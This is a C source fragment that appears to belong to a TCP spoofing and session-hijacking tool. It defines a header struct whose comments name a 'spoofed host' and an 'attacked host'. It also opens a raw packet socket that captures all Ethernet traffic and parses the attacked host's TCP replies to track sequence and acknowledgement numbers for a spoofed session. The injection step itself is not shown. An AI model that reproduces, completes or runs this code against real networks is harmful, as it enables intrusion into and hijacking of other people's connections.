#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/if_ether.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#undef __FAVOR_BSD
#include <fcntl.h>

struct spoofheader
{
    unsigned long src;    /* spoofed host  */
    unsigned long dest;   /* attacked host */
    unsigned short sport; /* spoofed host port */
    unsigned short dport; /* attacked host port */
    unsigned long seqnum; /* current seqnum */
    unsigned long acknum; /* current acknum */
    int datasend;         /* size of data last send */
    int client;           /* Did client send last? */
    unsigned char flags;
};

typedef struct spoofheader spoofhdr;

int init_read(int nonblock)
{
  int sock;
  
  sock = socket(PF_INET,SOCK_PACKET,htons(ETH_P_ALL));
  
  if(nonblock && sock != -1)
  {
        if(fcntl(sock,F_SETFL,O_NONBLOCK) == -1)
        {
            perror("fcntl");
            exit(-1);
        }
  }

  return sock;
}

char *gettcpreply(int sock,spoofhdr *hdr)
{
    struct iphdr *ip;
    struct tcphdr *tcp;
    char buf[4096];
    struct ether_header *ether;
    char *data;
    long len;


    memset(buf,0,sizeof(buf));
    if(read(sock,buf,sizeof(buf)) < sizeof(struct iphdr))
        return 0;

    ether= (struct ether_header *)buf;
    if(ntohs(ether->ether_type) != ETHERTYPE_IP) return 0;

    ip   = (struct iphdr *)(buf + sizeof(struct ether_header));
    tcp  = (struct tcphdr *)(buf + sizeof(struct ether_header) + (ip->ihl * 4));
    data = (char *)(buf + sizeof(struct ether_header) + sizeof(struct tcphdr) + (ip->ihl * 4));
 /*       
    printf("source: %s || dest: %s\n",inet_ntoa(ip->saddr),inet_ntoa(ip->daddr));
    printf("sport: %hu || dport: %hu\n",ntohs(tcp->th_sport),ntohs(tcp->th_dport));
*/
    if(ip->saddr == hdr->dest && ip->daddr == hdr->src && ip->protocol == IPPROTO_TCP) 
    {
        len = ntohs(ip->tot_len) - (ip->ihl * 4);

        if(ntohs(tcp->th_sport) == hdr->dport && ntohs(tcp->th_dport) == hdr->sport 
//           && ntohl(tcp->th_ack) == (hdr->seqnum + 1 + hdr->datasend)
        )
        {
            hdr->seqnum   = ntohl(tcp->th_seq);
            hdr->acknum   = ntohl(tcp->th_ack);
            hdr->datasend = len - sizeof(struct tcphdr);
            hdr->flags    = tcp->th_flags;

            return data;
        }
     }
     return 0;
}

